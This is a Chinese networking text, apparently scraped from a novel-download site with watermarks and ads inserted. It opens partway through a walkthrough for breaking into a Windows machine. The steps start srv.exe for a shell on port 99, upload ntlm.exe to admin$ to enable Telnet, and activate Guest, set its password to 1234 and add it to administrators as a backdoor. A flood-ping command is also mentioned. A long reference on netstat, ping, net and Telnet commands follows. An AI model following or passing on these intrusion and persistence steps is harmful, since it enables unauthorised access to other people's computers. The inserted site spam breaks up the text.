  用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）
  5.C:\>nettime\\127.0.0.1
  再查查到时间没有？如果127.0.0.1的当前时间是2002/3/19上午11:05，那就准备开始下面的命令。
  6.C:\>telnet127.0.0.199
  这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
  虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了
  7.C:\>copyntlm.exe\\127.0.0.1\admin$
  用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。
  8.C:\WINNT\system32>ntlm
  输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"netstarttelnet"来开启Telnet服务！
  9.Telnet127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)
  为了以防万一,我们再把guest激活加到管理组
  10.C:\>netuserguest/active:yes
  将对方的Guest用户激活
  11.C:\>netuserguest1234
  将Guest的密码改为1234,或者你要设定的密码
  12.C:\>netlocalgroupadministratorsguest/add
  将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)
U優书萌 uＵｔＸｔ．ｃom 荃蚊自扳越读

第一卷 第七章 字数:21603
  ??????
  QUOTE:
  网络里的常用dos命令详细介绍
  网络命令之：netstat命令
  这是一个观察网络连接状态的实用工具。
  它能检验IP的当前连接状态，在断定你的基本级通信正在进行后，就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和／或验证你正在创建一个与远程站点的会话，它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具，是WIN界面的，更加直观而已，并没有多什么功能，这个命令的具体用法如下：
  NETSTAT［-a］［-e］［-n］［-s］［-pproto］［-r］［interval］
  -A显示任何关联的协议控制块的地址。主要用于调试
  -a显示所有套接字的状态。在一般情况下不显示与服务器进程相关联的套接字
  -i显示自动配置接口的状态。那些在系统初始引导后配置的接口状态不在输出之列
  -m打印网络存储器的使用情况
  -n打印实际地址，而不是对地址的解释或者显示主机，网络名之类的符号
  -r打印路由选择表
  -faddress-family对于给出名字的地址簇打印统计数字和控制块信息。到目前为止，唯一支持的地址簇是inet
  -Iinterface只打印给出名字的接口状态
  -pprotocol-name只打印给出名字的协议的统计数字和协议控制块信息
  -s打印每个协议的统计数字
  -t在输出显示中用时间信息代替队列长度信息。
  网络命令之：PING命令
  这是TCP／IP协议中最有用的命令之一
  它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远程主机很有用，它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时间。
  Usage：ping［-t］［-a］［-ncount］［-lsize］［-f］［-iTTL］［-vTOS］
  ［-rcount］［-scount］［［-jhost-list］［-khost-list］］
  ［-wtimeout］destination-list
  Options：
  -tPingthespecifedhostuntilinterrupted.（除非人为中止，否则一直ping下去）
  -aResolveaddressestohostnames.（把IP转为主机名）
  -ncountNumberofechorequeststosend.（响应请求的数量）
  -lsizeSendbuffersize.（封包的大小）
  -fSetDon'tFragmentflaginpacket.（信息包中无碎片）
  -iTTLTimeToLive.（时间）
  -vTOSTypeOfService.（服务类型）
  -rcountRecordrouteforcounthops.
  -scountTimestampforcounthops.
  -jhost-listLoosesourceroutealonghost-list.
  -khost-listStrictsourceroutealonghost-list.（较严格的……唉，怎么译好……算了，放着吧）
  -wtimeoutTimeoutinmillisecondstowaitforeachreply.（timeout的时间）
  比如大家可能都知道的一个命令#ping-f-s65000***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令（当然这样只会造成我方自己的网络阻塞）。
  其实这个命令主要是用来看对方应答的速度，如果怎么ping得到的结果都是requesttimeout。那恐怕你根本就不用你去找这台主机了，它不在你的射程之内。
  网络命令之：net命令
  转自INTERNET
  许多WindowsNT网络命令以net开始。这些net命令有一些公共属性：
  通过键入net/?可查阅所有可用的net命令。
  通过键入nethelp命令可在命令行中获得net命令的语法帮助。例如，要得到netacco
  unts命令的帮助，请键入nethelpaccounts。
  所有net命令接受选项/yes和/no（可缩写为/y和/n）。/y对命令产生的任何交
  互提示自动回答“是”，/n回答“否”。例如，netstopserver通常提示确认是否根据服
  务器服务结束所有服务，netstopserver/y自动回答“是”并关闭服务器服务。
  NetAccounts
  更新用户帐号数据库、更改密码及所有帐号的登录要求。必须要在更改帐号参数的计算机上
  运行网络登录服务。
  netaccounts[/forcelogoff:{minutes|no}][/minpwlen:length][/maxpwage:{days|
  unlimited}][/minpwage:days][/uniquepw:number][/domain]
  netaccounts[/sync][/domain]
  参数
  无
  键入不带参数的netaccounts，将显示当前密码设置、登录时限及域信息。
  /forcelogoff:{minutes|no}
  设置当用户帐号或有效登录时间过期时，结束用户和服务器会话前的等待时间。no选项禁止
  强行注销。该参数的默认设置为no。
  指定/forcelogoff:minutes之后，WindowsNT在其强制用户退出网络minutes分钟之前
  ，将给用户发出警报。如果还有打开的文件，WindowsNT将警告用户。如果minutes小于
  两分钟，WindowsNT警告用户立即从网络注销。
  /minpwlen:length
  设置用户帐号密码的最少字符数。允许范围是0-14，默认值为6。
  /maxpwage:{days|unlimited}
  设置用户帐号密码有效的最大天数。unlimited不设置最大天数。/maxpwage选项的天数必
  须大于/minpwage。允许范围是1-49,710天(unlimited)。默认值为90天。
  /minpwage:days
  设置用户必须保持原密码的最小天数。0值不设置最小时间。允许范围是0-49,710天，默
  认值为0天。
  /uniquepw:number
  要求用户更改密码时，必须在经过number次后，才能重复使用与之相同的密码。允许范围
  是0-8。默认值为5。
  /domain
  在当前域的主域控制器上执行该操作。否则只在本地计算机执行操作。
  该参数仅用于WindowsNTServer域中的WindowsNTWorkstation计算机，WindowsNT
  Server计算机默认为在主域控制器执行操作。
  /sync
  当用于主域控制器时，该命令使域中所有备份域控制器同步；当用于备份域控制器时，该命
  令仅使该备份域控制器与主域控制器同步。该命令仅适用于WindowsNTServer域成员的计
  算机。
  NetComputer
  从域数据库中添加或删除计算机。该命令仅在运行WindowsNTServer的计算机上可用。
  netcomputer\computername{/add|/del}
  参数
  \computername
  指定要添加到域或从域中删除的计算机。
  /add
  将指定计算机添加到域。
  /del
  将指定计算机从域中删除。
  NetConfig
  显示当前运行的可配置服务，或显示并更改某项服务的设置。
  netconfig[service[options]]
  参数
  无
  键入不带参数的netconfig将显示可配置服务的列表。
  service
  通过netconfig命令进行配置的服务（server或workstation）。
  options
  服务的特定选项。完整语法请参阅netconfigserver或netconfigworkstation。
  NetConfigServer
  运行服务时显示或更改服务器的服务设置。
  netconfigserver[/autodisconnect:time][/srvcomment:"text"][/hidden:{yes|n
  o}]
  参数
  无
  键入不带参数的netconfigserver，将显示服务器服务的当前配置。
  /autodisconnect:time
  设置断开前用户会话闲置的最大时间值。可以指定-1，表示永不断开连接。允许范围是-1
  -65535分钟，默认值是15分钟。
  /srvcomment:"text"
  为服务器添加注释，可以通过netview命令在屏幕上显示所加注释。注释最多可达48个
  字符，文字要用引号引住。
  /hidden:{yes|no}
  指定服务器的计算机名是否出现在服务器列表中。请注意隐含某个服务器并不改变该服务器
  的权限。默认为no。
  NetConfigWorkstation
  服务运行时，显示或更改工作站各项服务的设置。
  netconfigworkstation[/charcount:bytes][/chartime:msec][/charwait:sec]
  参数
  无
  键入不带参数的netconfigworkstation将显示本地计算机的当前配置。
  /charcount:bytes
  指定WindowsNT在将数据发送到通讯设备之前收集的数据量。如果同时设置/chartime:m
  sec参数，WindowsNT按首先满足条件的选项运行。允许范围是0-65535字节，默认值是
  16字节。
  /chartime:msec
  指定WindowsNT在将数据发送到通讯设备之前收集数据的时间。如果同时设置/charcoun
  t:bytes参数，WindowsNT按首先满足条件的选项运行。允许范围是0-65535000毫秒，默
  认值是250毫秒。
  /charwait:sec
  设置WindowsNT等待通讯设备变为可用的时间。允许的范围是0-65535秒，默认值是36
  00秒。
  NetContinue
  重新激活挂起的服务。
  netcontinueservice
  参数
  service
  能够继续运行的服务，包括：fileserverformacintosh（该服务仅限于WindowsNTSe
  rver）,ftppublishingservice,lpdsvc,netlogon,networkdde，networkddedsdm
  ，ntlmsecuritysupportprovider，remoteboot（该服务仅限于WindowsNTServer），
  remoteaccessserver,schedule，server，simpletcp/ipservices及workstation。
  NetFile
  显示某服务器上所有打开的共享文件名及锁定文件数。该命令也可以关闭个别文件并取消文
  件锁定。
  netfile[id[/close]]
  参数
  无
  键入不带参数的netfile可获得服务器上打开文件的列表。
  id
  文件标识号。
  /close
  关闭打开的文件并释放锁定记录。请从共享文件的服务器中键入该命令。
  NetGroup
  在WindowsNTServer域中添加、显示或更改全局组。该命令仅在WindowsNTServer域
  中可用。
  netgroup[groupname[/comment:"text"]][/domain]
  netgroupgroupname{/add[/comment:"text"]|/delete}[/domain]
  netgroupgroupnameusername[...]{/add|/delete}[/domain]
  参数
  无
  键入不带参数的netgroup可以显示服务器名称及服务器的组名称。
  groupname
  要添加、扩展或删除的组。仅提供某个组名便可查看组中的用户列表。
  /comment:"text"
  为新建组或现有组添加注释。注释最多可以是48个字符，并用引号将注释文字引住。
  /domain
  在当前域的主域控制器中执行该操作，否则在本地计算机上执行操作。
  该参数仅用于作为WindowsNTServer域成员的WindowsNTWorkstation计算机。Windo
  wsNTServer计算机默认为在主域控制器中操作。
  username[...]
  列表显示要添加到组或从组中删除的一个或多个用户。使用空格分隔多个用户名称项。
  /add
  添加组或在组中添加用户名。必须使用该命令为添加到组中的用户建立帐号。
  /delete
  删除组或从组中删除用户名。
  NetHelp
  提供网络命令列表及帮助主题，或提供指定命令或主题的帮助。可用网络命令列于N下面的
  “命令参考”中“命令”窗口内。
  nethelp[command]
  netcommand{/help|/?}
  参数
  无
  键入不带参数的nethelp显示能够获得帮助的命令列表和帮助主题。
  command
  需要其帮助的命令，不要将net作为command的一部分。
  /help
  提供显示帮助文本方式选择。
  /?
  显示命令的正确语法。
  NetHelpmsg
  提供WindowsNT错误信息的帮助。
  nethelpmsgmessage#
  参数
  message#
  需要其帮助的WindowsNT消息的四位代码。
  NetLocalgroup
  添加、显示或更改本地组。
  netlocalgroup[groupname[/comment:"text"]][/domain]
  netlocalgroupgroupname{/add[/comment:"text"]|/delete}[/domain]
  netlocalgroupgroupnamename[...]{/add|/delete}[/domain]
  参数
  无
  键入不带参数的netlocalgroup将显示服务器名称和计算机的本地组名称。
  groupname
  要添加、扩充或删除的本地组名称。只提供groupname即可查看用户列表或本地组中的全局
  组。
  /comment:"text"
  为新建或现有组添加注释。注释文字的最大长度是48个字符，并用引号引住。
  /domain
  在当前域的主域控制器中执行操作，否则仅在本地计算机上执行操作。
  该参数仅应用于WindowsNTServer域中的WindowsNTWorkstation计算机。WindowsN
  TServer计算机默认为在主域控制器中操作。
  name[...]
  列出要添加到本地组或从本地组中删除的一个或多个用户名或组名，多个用户名或组名之间
  以空格分隔。可以是本地用户、其他域用户或全局组，但不能是其他本地组。如果是其他域
  的用户，要在用户名前加域名（例如，SALESRALPHR）。
  /add
  将全局组名或用户名添加到本地组中。在使用该命令将用户或全局组添加到本地组之前，必
  须为其建立帐号。
  /delete
  从本地组中删除组名或用户名。
  NetName
  添加或删除消息名（有时也称别名），或显示计算机接收消息的名称列表。要使用netnam
  e命令，计算机中必须运行信使服务。
  netname[name[/add|/delete]]
  参数
  无
  键入不带参数的netname将列出当前使用的名称。
  name
  指定接收消息的名称。名称最多为15个字符。
  /add
  将名称添加到计算机中。/add是可选项，键入netnamename与键入netnamename/a
  dd相同。
  /delete
  从计算机中删除名称。
  NetPause
  暂停正在运行的服务。
  netpauseservice
  参数
  service
  指下列服务：fileserverformacintosh（仅限于WindowsNTServer）、ftppublishi
  ngservice、lpdsvc、netlogon、networkdde、networkddedsdm、ntlmsecuritysup
  portprovider、remoteboot（仅限于WindowsNTServer）、remoteaccessserver、sch
  edule、server、simpletcp/ipservices或workstation。
  NetPrint
  显示或控制打印作业及打印队列。
  netprint\computernamesharename
  netprint[\computername]job#[/hold|/release|/delete]
  参数
  computername
  共享打印机队列的计算机名。
  sharename
  打印队列名称。当包含computername与sharename时，使用反斜杠()将它们分开。
  job#
  在打印机队列中分配给打印作业的标识号。有一个或多个打印机队列的计算机为每个打印作
  业分配唯一标识号。如果某个作业号用于共享打印机队列中，则不能指定给其他作业，也不
  能分配给其他打印机队列中的作业。
  /hold
  使用job#时，在打印机队列中使打印作业等待。打印作业停留在打印机队列中，并且其他
  打印作业只能等到释放该作业之后才能进入。
  /release
  释放保留的打印作业。
  /delete
  从打印机队列中删除打印作业。
  NetSend
  向网络的其他用户、计算机或通信名发送消息。要接收消息必须运行信使服务。
  netsend{name|*|/domain[:name]|/users}message
  参数
  name
  要接收发送消息的用户名、计算机名或通信名。如果计算机名包含空字符，则要将其用引号
  ("")引住。
  *
  将消息发送到组中所有名称。
  /domain[:name]
  将消息发送到计算机域中的所有名称。如果指定name，则消息将发送到指定域或组中的所有
  名称。
  /users
  将消息发送到与服务器连接的所有用户。
  message
  作为消息发送的文本。
  NetSession
  列出或断开本地计算机和与之连接的客户端的会话。
  netsession[\computername][/delete]
  参数
  无
  键入不带参数的netsession可以显示所有与本地计算机的会话的信息。
  \computername
  标识要列出或断开会话的计算机。
  /delete
  结束与\computername计算机会话并关闭本次会话期间计算机的所有打开文件。如果省略
  \computername参数，将取消与本地计算机的所有会话。
  NetShare
  创建、删除或显示共享资源。
  netsharesharename
  netsharesharename=drive:path[/users:number|/unlimited][/remark:"text"]
  netsharesharename[/users:number|unlimited][/remark:"text"]
  netshare{sharename|drive:path}/delete
  参数
  无
  键入不带参数的netshare将显示本地计算机上所有共享资源的信息。
  sharename
  是共享资源的网络名称。键入带sharename的netshare命令，只显示该共享信息。
  drive:path
  指定共享目录的绝对路径。
  /users:number
  设置可同时访问共享资源的最大用户数。
  /unlimited
  不限制同时访问共享资源的用户数。
  /remark:"text"
  添加关于资源的注释，注释文字用引号引住。
  /delete
  停止共享资源。
  NetStart
  启动服务，或显示已启动服务的列表。如果服务名是两个或两个以上的词，如NetLogon或
  ComputerBrowser，则必须用引号(")引住。.
  netstart[service]
  参数
  无
  键入不带参数的netstart则显示运行服务的列表。
  service
  包括下列服务：alerter、clientservicefornetware、clipbookserver、computerbr
  owser、dhcpclient、directoryreplicator、eventlog、ftppublishingservice、
  lpdsvc、messenger、netlogon、networkdde、networkddedsdm、networkmonitor
  ingagent、ntlmsecuritysupportprovider、ole、remoteaccessconnectionman
  ager、remoteaccessisnsapservice、remoteaccessserver、remoteprocedureca
  ll(rpc)locator、remoteprocedurecall(rpc)service、schedule、server、sim
  pletcp/ipservices、snmp、spooler、tcp/ipnetbioshelper、ups及workstation
  。
  下列服务仅在WindowsNTServer下可用：fileserverformacintosh、gatewayservic
  efornetware、microsoftdhcpserver、printserverformacintosh、remoteboot、wi
  ndowsinternetnameservice。
  NetStatistics
  显示本地工作站或服务器服务的统计记录。
  netstatistics[workstation|server]
  参数
  无
  键入不带参数的netstatistics将列出其统计信息可用的运行服务。
  workstation
  显示本地工作站服务的统计信息。
  server
  显示本地服务器服务的统计信息。
  NetStop
  停止WindowsNT网络服务。
  netstopservice
  参数
  service
  包括下列服务：alerter（警报）、clientservicefornetware（Netware客户端服务）
  、clipbookserver（剪贴簿服务器）、computerbrowser（计算机浏览器）、directoryr
  eplicator（目录复制器）、ftppublishingservice(ftp)（ftp发行服务）、lpdsvc、
  messenger（信使）、netlogon（网络登录）、networkdde（网络dde）、networkdded
  sdm（网络ddedsdm）、networkmonitoragent（网络监控代理）、ntlmsecuritysupp
  ortprovider（NTLM安全性支持提供）、ole（对象链接与嵌入）、remoteaccessconne
  ctionmanager（远程访问连接管理器）、remoteaccessisnsapservice（远程访问isns
  ap服务）、remoteaccessserver（远程访问服务器）、remoteprocedurecall(rpc)l
  ocator（远程过程调用定位器）、remoteprocedurecall(rpc)service（远程过程调用服
  务）、schedule（调度）、server（服务器）、simpletcp/ipservices（简单TCP/IP服
  务）、snmp、spooler（后台打印程序）、tcp/ipnetbioshelper（TCP/IPNETBIOS辅助工
  具）、ups及workstation（工作站）。
  下列服务仅在WindowsNTServer中可用：fileserverformacintosh、gatewayservi
  cefornetware、microsoftdhcpserver、printserverformacintosh、remoteboot、w
  indowsinternetnameservice。
  NetTime
  使计算机的时钟与另一台计算机或域的时间同步。不带/set参数使用时，将显示另一台计
  算机或域的时间。
  nettime[\computername|/domain[:name]][/set]
  参数
  \computername
  要检查或同步的服务器名。
  /domain[:name]
  指定要与其时间同步的域。
  /set
  使本计算机时钟与指定计算机或域的时钟同步。
  NetUse
  连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。该命令也控制永久
  网络连接。
  netuse[devicename|*][\computernamesharename[volume]][password|*]][/user
  :[domainname]username][[/delete]|[/persistent:{yes|no}]]
  netusedevicename[/home[password|*]][/delete:{yes|no}]
  netuse[/persistent:{yes|no}]
  参数
  无
  键入不带参数的netuse将列出网络连接。
  devicename
  指定要连接到的资源名称或要断开的设备名称。有两类设备名：磁盘驱动器（D:到Z:）和
  打印机（LPT1:到LPT3）。若键入星号而不是指定设备名将分配下一个可用设备名。
  \computernamesharename
  服务器及共享资源的名称。如果计算机名包含空白字符，要用引号("")将双反斜线及计算
  机名引住。计算机名长度可以是1-15个字符。
  volume
  指定服务器上的NetWare卷。要连接到NetWare服务器，必须安装并运行NetWare客户机
  服务(WindowsNTWorkstation)或NetWare网关服务(WindowsNTServer)。
  password
  访问共享资源的密码。
  *
  提示键入密码。在密码提示行中键入密码时，将不显示该密码。
  /user
  指定进行连接的另外一个用户。
  domainname
  指定另一个域。例如netused:\servershare/user:adminmariel连接用户mariel，如
  同从admin域连接一样。如果省略域，将使用当前登录域。
  username
  指定登录的用户名。
  /home
  将用户连接到其宿主目录。
  /delete
  取消指定网络连接。如果用户以星号指定连接，则取消所有网络连接。
  /persistent
  控制永久网络连接的使用。默认为上次使用的设置。无设备的连接不是永久的。
  yes
  保存建立的所有连接，并在下次登录时还原。
  no
  不保存建立的连接和继发连接，并在下次登录时还原现有连接。使用/delete开关项取消永
  久连接。
  NetUser
  添加或更改用户帐号或显示用户帐号信息。
  netuser[username[password|*][options]][/domain]
  netuserusername{password|*}/add[options][/domain]
  netuserusername[/delete][/domain]
  参数
  无
  键入不带参数的netuser将查看计算机上的用户帐号列表。
  username
  添加、删除、更改或查看用户帐号名。用户帐号名最多可以有20个字符。
  password
  为用户帐号分配或更改密码。密码必须满足在netaccounts命令/minpwlen选项中设置的
  最小参数。最多是14个字符。
  *
  提示输入密码。在密码提示行中键入密码时，将不显示该密码。
  /domain
  在计算机主域的主域控制器中执行操作。
  该参数仅在WindowsNTServer域成员的WindowsNTWorkstation计算机上可用。默认情
  况下，WindowsNTServer计算机在主域控制器中执行操作。
  注意：在计算机主域的主域控制器发生该动作。它可能不是登录域。
  /add
  将用户帐号添加到用户帐号数据库。
  /delete
  从用户帐号数据库中删除用户帐号。
  选项如下所示：
  /active:{no|yes}
  启用或禁止用户帐号。如果不激活用户帐号，用户就不能访问计算机上的资源。默认值是y
  es（激活）。
  /comment:"text"
  提供用户帐号的注释。该注释最多可以有48个字符，文字用引号引住。
  /countrycode:nnn
  使用操作系统的国家代码以便为用户帮助和错误信息文件提供指定语言文件。0值表示默认
  国家代码。
  /expires:{date|never}
  如果设置date，将导致用户帐号过期，never不对用户帐号设置时间限制。过期日期根据
  /countrycode值可以是下列格式：mm/dd/yy、dd/mm/yy或mmm,dd,yy。注意帐号在指定
  日期开始时过期。月份可以是数字、全名或三个字母的简拼。年可以是两位或四位数，使用
  逗号或斜线（不要用空格）区分日期的各部分。如果省略yy，则使用该日期下一次到来的
  年份（根据计算机的时钟）。例如如果在1994年1月10日到1995年1月8日之间输
  入下列日期项，那它们相同：jan,9
  1/9/95
  january,9,1995
  1/9
  /fullname:"name"
  指定用户全名而不是用户名。用引号将名字引住。
  /homedir:path
  设置用户宿主目录的路径。该路径必须存在。
  /homedirreq:{yes|no}
  设置是否需要宿主目录。
  /passwordchg:{yes|no}
  指定用户是否能改变自己的密码。默认值是yes。
  /passwordreq:{yes|no}
  指定用户帐号是否需要密码，默认值是yes。
  /profilepath:[path]
  设置用户登录配置文件的路径。该路径名指向注册表配置文件。
  /scriptpath:path
  为用户登录脚本设置路径。Path不能是绝对路径；
  path是相对于%systemroot%SYSTEM32REPLIMPORTSCRIPTS的相对路径：。
  /times:{times|all}
  指定允许用户使用计算机的时间。times值表示为day[-day][,day[-day]],time[-time
  ][,time[-time]],增量限制为一小时。Days可以是全名或简写（M、T、W、Th、F、Sa、S
  u）。Hours可以是12小时制或24小时制。对于12小时值，使用AM、PM或A.M、P.M
  。all表示用户总可以登录。空值表示用户永远不能登录。用逗号分隔日期和时间，分隔时
  间和日期的单位用分号（例如M,4AM-5PM;T,1PM-3PM）。指定/times时不要使用空格。
  /usercomment:"text"
  让管理员添加或更改帐号的“用户注释”。用引号引住文字。
  /workstations:{computername[,...]|*}
  列出最多八个用户可以登录到网络的工作站。用逗号分隔列表中的多个项。如果/workstat
  ions没有列表，或如果列表是星号“*”，则用户可以从任何一台计算机登录。
  NetView
  显示域列表、计算机列表或指定计算机的共享资源列表。
  netview[\computername|/domain[:domainname]]
  netview/network:nw[\computername]
  参数
  无
  键入不带参数的netview将显示当前域的计算机列表。
  \computername
  指定要查看其共享资源的计算机。
  /domain[:domainname]
  指定要查看其可用计算机的域。如果省略domainname，则显示网络的所有域。
  /network:nw
  显示NetWare网络中所有可用的服务器。如果指定计算机名，则显示NetWare网络中该计
  算机的可用资源。也可以用此开关指定添加到系统中的其他网络。
  网络命令之：Telnet命令简介
  Telnet用于Internet的远程登录.它可以使用户坐在已上网的电脑键盘前通过网络进入的另一台电脑已上网的电脑,使它们互相连通.这种连通可以发生在同一房间里面的电脑或是在世界各范围内已上网的电脑.习惯上来说,被连通计算机,并且为网络上所有用户提供服务的计算机称之为服务器(Servers),而自己在使用的机器称之为客户机(Customer).一旦连通后,客户机可以享有服务器所提供的一切服务.用户可以运行通常的交互过程(注册进入,执行命令),也可以进入很多的特殊的服务器如寻找图书索引.网上不同的主机提供的各种服务都可以被使用.
  使用Telnet的最简单的方法是在命令行键入:
  %telnetremote-computer-name(orIP)
  这里使用的是UNIX系统的Cshell,因为命令的选择是百分号"%".如果使用的是其他的计算机系统(比如:Dos,VAX/VMS,Macintosh)命令,只在细节上有些差异,而在本质上是大同小异的,下面举一个基本的Telnet使用例子:
  telnetporky.math.ukans.edu
  Trying129.237.128.11...
  Connectedtoporky.math.ukans.edu.
  Escapecharacteris'^]'.
  SunOSUNIX(porky)
  login:wl
  password:xxxxxxx
  LastLogin:TueMar2805:35fromns.bta.net.cn
  SunOSRelease4.1.3_U1(SLIPPERY1)#3:SunNov2023:47:23CST1999
  Nomatch.
  if:Expressionsyntax.
  porky/serv/wl%ls
  hello
  porky/serv/wl%
  porky/serv/wl%cd/
  porky/%ls
  Mail/dev/home/mnt/sbin/
  usr/
  News/domain/home1/net/serv/
  var/
  Record/etc/kadb*pcfs/sys@
  vmunix*
  bin@export/lib@printtmp/
  bootgofer/lost+found/recordtmp_mnt/
  porky/%
悠幽書盟 uutｘｔ．ｃOＭ 诠蚊吇坂越渎

网络技术入门的最新章节已更新,请登陆小说下载网
www.uutxt.com
进行下载.
最快的小说更新请访问
http://www.niaoyan.com
更多精彩内容,尽在鸟眼快读.